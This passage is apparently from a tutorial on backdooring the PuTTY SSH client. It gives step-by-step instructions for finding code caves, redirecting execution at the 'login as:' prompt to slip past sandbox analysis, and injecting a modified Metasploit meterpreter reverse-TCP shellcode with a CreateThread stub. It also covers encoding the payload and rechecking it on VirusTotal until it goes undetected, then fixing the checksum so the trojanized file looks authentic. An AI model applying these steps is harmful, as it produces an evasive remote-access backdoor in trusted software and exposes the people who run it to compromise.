AV product because of using already existing common sections. Also overall size of the PE
file will not changed at the end of backdooring process but this method also has few
drawbacks.
The number and size of the code caves varies file to file but generally there is not so much
space compared to adding a new section. When using code caves, backdoor code should be
trimmed as much as possible. Another drawback is the section flags. Since the execution of
the application will be redirected to the cave, the section which contains the cave should
have “execute” privileges, even some shellcodes (encoded or obfuscated in a self modifying
way) needs also “write” privileges in order to make changes inside the section.
Usage of multiple code caves will help overcoming the space limitation problem also
splitting the backdoor code to pieces will have a positive affect on detection score but
unfortunately changing the section privileges will look suspicious. There are few advanced
methods that modifies the memory region privileges on runtime in order to avoid changing
the section privileges directly, but because of those methods requires custom crafted
shellcodes, encodes and IAT parsing techniques, it will be next articles subject.
With the help of a tool called Cminer it is very easy to enumerate all code caves of a binary
file, ./Cminer putty.exe 300 command enumerates the code caves witch is bigger than 300
bytes,
In this case there are 5 good code caves that can be used. Start address gives the virtual
memory address(VMA) of the cave. This is the address of the cave when PE file loaded into
memory, file offset is the location address of cave inside the PE file in terms of bytes.
It seems most of the caves are inside data sections, because of data sections doesn’t have
execute privileges section flags, needs to be changed. Backdoor code will be around 400-
500 bytes so cave 5 should be more than enough. The start address of selected cave
should be saved, after changing the section privileges to R/W/E the first step of
backdooring process will be completed. Now it’s time to redirecting the execution.

Hijacking Execution Flow


In this step, the goal is redirecting the execution flow to the backdoor code by modifying a
instruction from target executable. There is one important detail about selecting the
instruction that will be modified. All binary instructions has a size in manner of bytes, in
order to jump to the backdoor code address, a long jump will be used which is 5 or 6 bytes.
So when patching the binary, the instruction that will be patched needs to be the same size
with a long jump instruction, otherwise the previous or next instruction will be corrupted.
Selecting the right space for redirecting the execution is very important for bypassing the
dynamic and sandbox analysis mechanisms of AV products. If redirection occurs directly it
will probably be detected at the dynamic analysis phase of AV scanners.
Hiding Under User Interaction:
The first things that comes in mind for bypassing sandbox/dynamic analysis phase is
delaying the execution of the shellcode or designing sandbox aware shellcodes and trigger
mechanisms. But when backdooring, most of the time there is not so much space for
adding these kind of extra code inside PE file. Also designing anti detection mechanisms in
assembly level languages requires a lot of time and knowledge.
This method takes advantage of functions that requires user interactions in order to
perform operations, redirecting the execution inside such functions will serve as a trigger
mechanism for activating the backdoor code only if when a real user operating the
program. If this method can be implemented correctly, it will have %100 success rate and
it will not increase the backdoor code size.
The “Open” button on putty executable UI launches a function that checks the validity of
the given ip address,

If the ip address field value is not empty and valid, it launches a connection function that
tries to connect the given ip address.
If client successfully creates a ssh session a new windows pops up and asks for credentials,
This will be the point that redirection will occur, since no AV product is not advanced
enough for replicating this kind of complex usage, the implanted backdoor will not be
detected whit automated sandbox and dynamic analysis mechanisms.
With using basic reverse engineering methods like following strings and string references it
will not be hard to find the address of the connection function. After client establishes a
connection with the given ip, there is a string “login as: “ printed to the appeared window.
This string will help us find the address of the connection function, IDA Pro does a very
good job in terms of following the string references.
For finding the “login as:” string open Views->Open Subviews->Strings on IDA

After finding the string double click on it for going to location, inside data sections IDA finds
all the cross references that have made for the strings, with pressing “Ctrl+X” it shows all
cross references,
This reference made inside the function that prints the “login as: ” string,
This will be the instruction that is going to be patched, before making any changes take
note of the instruction. After the execution of the backdoor code it will be used again.

With changing the PUSH 467C7C instruction to JMP 0x47A478 redirection phase of backdooring
process is completed. It is important to take note of the next instruction address. It will be
used as returning address after the execution of the backdoor code. Next step will be
injecting the backdoor code.

Injecting Backdoor Code


While injecting backdoor code the first think that needs to be done is saving the registers
before the execution of the backdoor. Every value inside all registers is extremely important
for the execution of the program. With placing PUSHAD and PUSHFD instructions at the
begging of the code cave all the registers and register flags are stored inside stack. These
values will popped back after the execution of the backdoor code so the program can
continue execution without any problem.

As mentioned earlier, the backdoor code that will be used is meterpreter reverse tcp
shellcode from metasploit project. But there needs to be few changes inside shellcode.
Normally reverse tcp shellcode tries to connect to the handler given number of times and if
the connection fails it closes the process by calling a ExitProcess API call.

The problem here is, if the connection to handler fails the execution of the putty client will
stop, with changing few lines of the shellcodes assembly now every time connection fails
shellcode will retry to connect to the handler, also size of the shellcode is decreased.
After making the necessary changes inside assembly code compile it with nasm -f bin
stager_reverse_tcp_nx.asm command. Now the reverse tcp shellcode is ready to use, but it will
not be placed directly. The goal is executing the shellcode on a new thread. In order to
create a new thread instance, there needs to be another shellcode that makes a CreateThread
API call that is pointing to reverse tcp shellcode. There is also a shellcode for creating
threads inside metasploit project written by Stephen Fever,
After placing the shellcode bytes inside createthread.asm file in hex format like above, it is
ready to be assembled with nasm -f bin createthread.asm command. At this point the shellcode is
ready to be inserted to the cave but before inserting the shellcode it should be encoded in
order to bypass the static/signature analysis mechanisms of AV products. Because of all
encoders inside metasploit project are known by majority of AV products, using custom
encoders is highly suggested. This paper will not cover the making of such custom
shellcode encoders because it will be yet another article’s subject but using multiple
metasploit encoders may also work. After each encoding process uploading the encoded
shellcode to virus total in raw format and checking the detection score is suggested. Try

every combination until it gets undetected or wait for the next article .
After properly encoding the shellcode, it is time for inserting it to the code cave. Select the
instruction just under the PUSHFD and press Ctrl+E on immunity debugger, shellcode will
be pasted here in hex format.

With xxd -ps createthread command, print the encoded createthread shellcode in hex format or
open the shellcode with a hex editor and copy the hex values. While pasting the hex values
to debugger be careful about the byte limit, these patching operations are made with
immunity debugger and immunity debugger has a byte limit when pasting to edit code
window. It will not paste all of the shellcode, remember the last 2 byte of the pasted
shellcode inside edit code window, after pressing the OK button continue pasting the bytes
where they end, when all shellcode is pasted to code cave the insertion of the backdoor
code is complete.

Restoring Execution Flow


After the creation of the backdoor code thread, the program needs to turn back to its ordin
ary execution, this means EIP should jump back to the function that redirected the executio
n to the cave.
But before jumping back to that function all the saved register should be retrieved.
With placing POPFD and POPAD instruction at the end of the shellcode, all saved register
are poped backed from stack in the same order. After retrieving the registers there is one
more think to do before jumping back. It is executing the hijacked instruction, the PUSH
467C7C instruction was replaced with JMP 0x47A478 in order to redirect the execution of the
program to the code cave. Now with placing the PUSH 467C7C instruction at the end,
hijacked instruction is retrieved also. It is time for returning back to the function that
redirected the execution to the cave with inserting JMP 0x41CB73 instruction, at the end the
resulting code should look like like below.

At the end select all patched and inserted instruction, press right-click and Copy to
executable. This operation should be done to every instruction that have been modified.
When all instructions are copied and saved to file, close the debugger and test out the
executable, if executable is running smoothly the backdoor is ready to use.
Finally, fixing the final file checksum is suggested for preserving authenticity of the file and
not to look suspicious, also this may have a effect on decreasing the detection score.

Conclusion
At the end, when all methods are applied properly, resulting backdoor is fully undetecable.
POC

It’s time to see our be loved “backdoored” putty on action .

References

http://NoDistribute.com/result/image/Ye0pnGHXiWvSVErkLfTblmAUQ.png

You might also like